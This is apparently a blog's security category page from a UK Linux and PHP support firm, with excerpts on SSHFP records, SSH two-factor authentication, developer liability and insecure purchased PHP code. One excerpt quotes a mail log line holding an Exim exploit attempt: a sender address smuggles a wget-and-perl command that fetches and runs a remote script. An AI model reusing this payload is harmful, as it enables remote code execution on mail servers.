Linux and PHP web application support and development (Bromsgrove, UK)

tel: 0845 0046746

security

SSH fingerprint (sshfp) dns records

To help aid security for SSH connections, you can publish ‘SSHFP’ records in DNS which contain a fingerprint of a server’s ssh host key. If DNSSEC is in use throughout the DNS hierarchy then it ought to provide a trusted way of verifying remote hosts when no record already exists in your ~/.ssh/known_hosts file. To […]

, ,

Read more...

Today’s most interesting email (exim, security)

Aside from generally getting too much email, today this gem arrived …. Presumably there is/was a vulnerability in Exim. Thankfully this server runs Postfix. Jun 18 23:47:47 xxxx postfix/cleanup[727]: 718FF848036: message-id=<> Jun 18 23:47:47 xxxx postfix/qmgr[1444]: 718FF848036: from=<x`wget${IFS}-O${IFS}/tmp/p.pl${IFS}radioactivefrog.com/.x/exim.txt“perl${IFS}/tmp/p.pl`@blaat.com>, size=206, nrcpt=1 (queue active)

, , ,

Read more...

Two Factor Authentication for remote SSH users (using google authenticator)

Using Google’s Authenticator, we can change a Debian Linux host to make it require two factor authentication for remote users (or selected users based on name/ip address) as follows.

, ,

Read more...

Being sued for security holes?

TechRepublic have an interesting article covering whether Software Developers should face legal action if their coding results in (presumably exploited) security vulnerabilities. Given that most security breaches result in data loss (for individuals) – fines from the ICO ought to be relevant – Tesco being investigated by the ICO Belfast NHS Trust fined £225,000 by the […]

,

Read more...

What you don’t want to see ….

A customer recently asked us to perform some enhancements to some code they’d purchased – when we started looking at it, some obvious glaring security holes stood out – //This stops SQL Injection in GET vars foreach ($_GET as $key => $value) { $_GET[$key] = mysql_real_escape_string($value); } And – if (isset($_GET[“job_id”])) { $job_id = mysql_real_escape_string($_GET[“job_id”]); […]

Read more...